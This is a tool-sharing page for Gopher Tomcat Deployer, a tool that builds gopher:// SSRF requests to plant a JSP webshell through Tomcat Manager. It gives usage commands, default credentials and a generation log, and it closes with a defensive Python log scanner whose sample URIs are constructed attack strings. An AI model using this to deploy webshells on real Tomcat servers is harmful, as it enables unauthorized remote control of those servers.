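Gopher Tomcat Deployer
Author: Sec-Labs | Published:
Project URL
https://github.com/pimps/gopher-tomcat-deployer
Editor's notes
Gopher Tomcat Deployer is a tool for deploying malicious web applications: it generates a GOPHER request that deploys a malicious application to the Manager application of a Tomcat server. An attacker can then access and control the Tomcat server through that application and carry out further attacks. Using the tool requires some web security knowledge and skill, and compliance with applicable laws and regulations. Do not use it for illegal purposes.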

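Usage
- Install a Python environment first.
- Download Gopher Tomcat Deployer and save it locally.
- In a terminal, change to the directory that contains Gopher Tomcat Deployer.
- Run the following command to view the help text:
  $ python gopher-tomcat-deployer.py -h
- Run the following command to generate the GOPHER request for the malicious application, to be deployed in Tomcat Manager:
  $ python gopher-tomcat-deployer.py webshell
  Here, webshell is the path of the web backdoor to deploy; it can be any valid .jsp file.
- The following optional parameters are also available:
  -h, --help                        show the help message and exit
  -o OUTPUT, --output OUTPUT        output file name (default: cmd.war)
  -u USER, --user USER              Tomcat user (default: admin)
  -p PASSWORD, --password PASSWORD  Tomcat password (default: admin)
  -t TARGET, --target TARGET        target Tomcat IP address (default: 127.0.0.1)
  -pt PORT, --port PORT             target Tomcat port (default: 8080)
- For example, run the following command to specify a different Tomcat user and password:
  $ python gopher-tomcat-deployer.py webshell -u myuser -p mypassword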
Example
$ python gopher-tomcat-deployer.py -u admin -p admin -t 127.0.0.1 -pt 8080 cmd.jsp
=============================================================================
| GOPHER TOMCAT DEPLOYER v0.1 |
| by pimps and alec |
=============================================================================
Original file length: 00000360
Original file crc32: f724925e
The input file CRC32 or file length contained an invalid byte.
Length adjustment completed. 2 whitespace ' ' chars were added to the webshell input.
New file length: 00000362
New file crc32: d50a6303
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[-] Invalid checksum/offset found in zip file. Adding white space and trying again...
Original file length: 00000363
Original file crc32: 70b0949c
The input file CRC32 or file length contained an invalid byte.
Length adjustment completed. 2 whitespace ' ' chars were added to the webshell input.
New file length: 00000365
New file crc32: c5a5f46e
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[-] Invalid checksum/offset found in zip file. Adding white space and trying again...
Original file length: 00000366
Original file crc32: 43a326ee
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[-] Invalid checksum/offset found in zip file. Adding white space and trying again...
Original file length: 00000367
Original file crc32: ae9da31c
The input file CRC32 or file length contained an invalid byte.
Length adjustment completed. 1 whitespace ' ' chars were added to the webshell input.
New file length: 00000368
New file crc32: fdc30ea9
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[-] Invalid checksum/offset found in zip file. Adding white space and trying again...
[ SNIP FOR BREVITY ]
Original file length: 000003FA
Original file crc32: 83d9dad0
The input file CRC32 or file length contained an invalid byte.
Length adjustment completed. 1 whitespace ' ' chars were added to the webshell input.
New file length: 000003FB
New file crc32: 6f3cc44b
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[-] Invalid checksum/offset found in zip file. Adding white space and trying again...
Original file length: 000003FC
Original file crc32: 80d6b99
The input file CRC32 or file length contained an invalid byte.
Length adjustment completed. 4 whitespace ' ' chars were added to the webshell input.
New file length: 00000400
New file crc32: 286e4e38
[+] Creating new zip file: cmd.war
[+] Validating created war file... cmd.war
[+] Valid WAR file generated... Creating the gopher payload now...
[+] Payload generated with success:
------------------------------------------------------------------------
------------------------------------------------------------------------
HACK THE PLANET!!1!11!
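A detection-side companion to the run above, added here as an example and not part of the original page or the tool: it scans logged request URIs for a parameter holding a gopher:// URL whose selector is a percent-encoded HTTP request, which is the kind of request to the Tomcat Manager that the tool described here generates. The /fetch and /proxy endpoints, the parameter names and the sample lines are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote, unquote_to_bytes

GOPHER = re.compile(r"gopher://(\[[^\]]+\]|[^/:\s]+)(?::\d+)?/(.)(.*)", re.I | re.S)
REQUEST_LINE = re.compile(rb"(GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) HTTP/1\.[01]\r?\n")

def is_internal(host):
    """True for localhost and loopback/private/link-local IP literals."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:  # a DNS name, not an IP literal
        return host.lower() == "localhost"
    return ip.is_loopback or ip.is_private or ip.is_link_local

def inspect_gopher_url(url):
    """Return a finding if url is a gopher:// URL whose selector is an HTTP request."""
    m = GOPHER.match(url)
    if not m:
        return None
    selector = unquote_to_bytes(m.group(3))  # bytes after the one-character item type
    req = REQUEST_LINE.match(selector)
    if not req:
        return None
    head = selector.split(b"\r\n\r\n", 1)[0].lower()
    path = req.group(2).decode(errors="replace")
    return {"internal": is_internal(m.group(1)), "method": req.group(1).decode(),
            "path": path, "tomcat_manager": path.startswith("/manager/"),
            "has_credentials": b"\r\nauthorization:" in head}

def scan_request_uri(request_uri):
    """Check each query parameter of a logged URI: raw, then percent-decoded up to twice."""
    findings = []
    for pair in request_uri.partition("?")[2].split("&"):
        name, _, value = pair.partition("=")
        for _ in range(3):
            finding = inspect_gopher_url(value)
            if finding:
                findings.append({"param": name, **finding})
                break
            value = unquote(value)
    return findings

# Constructed sample log entries (hypothetical endpoints, placeholder credential value).
SAMPLE_DIRECT = "/fetch?url=gopher://127.0.0.1:8080/_POST%20/manager/html/upload%20HTTP/1.1%0d%0aHost:%20127.0.0.1:8080%0d%0aAuthorization:%20Basic%20PLACEHOLDER%0d%0a%0d%0a"
SAMPLE_ENCODED = "/proxy?id=7&u=gopher%3A%2F%2F10.0.0.5%3A8080%2F_GET%2520%2Fmanager%2Fhtml%2520HTTP%2F1.1%250d%250a%250d%250a"
SAMPLE_BENIGN = "/fetch?url=https%3A%2F%2Fexample.com%2Flogo.png"
```

On the fetching side, accepting only http and https URLs in any server-side fetcher removes this delivery path; the scan is for finding attempts in existing logs.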
Tags: tool sharing, scanning tools, EXP scripts